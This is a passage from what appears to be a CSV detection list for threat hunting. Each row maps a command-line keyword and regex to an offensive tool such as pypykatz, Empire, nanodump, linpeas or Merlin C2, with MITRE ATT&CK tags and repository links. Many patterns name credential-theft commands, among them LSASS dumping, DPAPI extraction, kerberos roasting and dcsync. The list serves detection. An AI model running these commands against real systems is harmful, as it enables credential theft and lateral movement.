- T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* ldeep_dump *",".{0,1000}\sldeep_dump\s.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","0","N/A","5","4","342","39","2024-03-28T10:30:53Z","2018-10-22T18:21:44Z" "* letmein.ps1*",".{0,1000}\sletmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* lexmark-config.nse*",".{0,1000}\slexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lfs_injection.exe*",".{0,1000}\slfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* libpwn.c*",".{0,1000}\slibpwn\.c.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* libpwn.so*",".{0,1000}\slibpwn\.so.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* link smb * merlinPipe*",".{0,1000}\slink\ssmb\s.{0,1000}\smerlinPipe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "* 
linpeas.sh *",".{0,1000}\slinpeas\.sh\s.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* linpeas.sh*",".{0,1000}\slinpeas\.sh.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -linpeas=http://*",".{0,1000}\s\-linpeas\=http\:\/\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* -linpeas=http://127.0.0.1/linpeas.sh*",".{0,1000}\s\-linpeas\=http\:\/\/127\.0\.0\.1\/linpeas\.sh.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* linux_stealth.py*",".{0,1000}\slinux_stealth\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* linWinPwn*",".{0,1000}\slinWinPwn.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --list=hidden-options*",".{0,1000}\s\-\-list\=hidden\-options.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* -listen :* -socks * -cert * -agentpassword *",".{0,1000}\s\-listen\s\:.{0,1000}\s\-socks\s.{0,1000}\s\-cert\s.{0,1000}\s\-agentpassword\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "* -ListMetasploitPayloads*",".{0,1000}\s\-ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable 
python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "* --list-payloads*",".{0,1000}\s\-\-list\-payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* live dpapi blobfile *.blob*",".{0,1000}\slive\sdpapi\sblobfile\s.{0,1000}\.blob.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi cred *",".{0,1000}\slive\sdpapi\scred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi keys -o *",".{0,1000}\slive\sdpapi\skeys\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi 
securestring *",".{0,1000}\slive\sdpapi\ssecurestring\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi vcred *",".{0,1000}\slive\sdpapi\svcred\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi vpol *",".{0,1000}\slive\sdpapi\svpol\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live dpapi wifi*",".{0,1000}\slive\sdpapi\swifi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos apreq *",".{0,1000}\slive\skerberos\sapreq\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos dump*",".{0,1000}\slive\skerberos\sdump.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos purge*",".{0,1000}\slive\skerberos\spurge.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos roast*",".{0,1000}\slive\skerberos\sroast.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos sessions*",".{0,1000}\slive\skerberos\ssessions.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos tgt*",".{0,1000}\slive\skerberos\stgt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live kerberos triage*",".{0,1000}\slive\skerberos\striage.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live lsa -o 
*",".{0,1000}\slive\slsa\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live process create -c regedit*",".{0,1000}\slive\sprocess\screate\s\-c\sregedit.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb client *",".{0,1000}\slive\ssmb\sclient\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb dcsync *",".{0,1000}\slive\ssmb\sdcsync\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb lsassdump *",".{0,1000}\slive\ssmb\slsassdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential
Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb regdump *",".{0,1000}\slive\ssmb\sregdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smb secretsdump *",".{0,1000}\slive\ssmb\ssecretsdump\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smbapi localgroup enum -t*",".{0,1000}\slive\ssmbapi\slocalgroup\senum\s\-t.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smbapi session enum *",".{0,1000}\slive\ssmbapi\ssession\senum\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live smbapi share enum*",".{0,1000}\slive\ssmbapi\sshare\senum.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* live users 
whoami*",".{0,1000}\slive\susers\swhoami.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* llmnr-resolve.nse*",".{0,1000}\sllmnr\-resolve\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -LLMNRTTL *",".{0,1000}\s\-LLMNRTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -llmnrtypes AAAA*",".{0,1000}\s\-llmnrtypes\sAAAA.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* lltd-discovery.nse*",".{0,1000}\slltd\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --llvm-obfuscator * ",".{0,1000}\s\-\-llvm\-obfuscator\s.{0,1000}\s","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "* LMHASH:NTHASH*",".{0,1000}\sLMHASH\:NTHASH.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* lnkbomb.py*",".{0,1000}\slnkbomb\.py.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "* -LNKPath * -EncScript *",".{0,1000}\s\-LNKPath\s.{0,1000}\s\-EncScript\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BackdoorLNK.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* load_extra_pots*",".{0,1000}\sload_extra_pots.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --load-dll *ssp.dll*",".{0,1000}\s\-\-load\-dll\s.{0,1000}ssp\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army 
knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*----- LOADLIBRARYA HOOK -----*",".{0,1000}\-\-\-\-\-\sLOADLIBRARYA\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "* --load-shellcode *",".{0,1000}\s\-\-load\-shellcode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* local class-instances SMS_Authority*",".{0,1000}\slocal\sclass\-instances\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local class-properties SMS_Authority*",".{0,1000}\slocal\sclass\-properties\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local grep *ccmsetup started *ccmsetup.log*",".{0,1000}\slocal\sgrep\s.{0,1000}ccmsetup\sstarted\s.{0,1000}ccmsetup\.log.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local query * FROM SMS_Authority*",".{0,1000}\slocal\squery\s.{0,1000}\sFROM\sSMS_Authority.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" 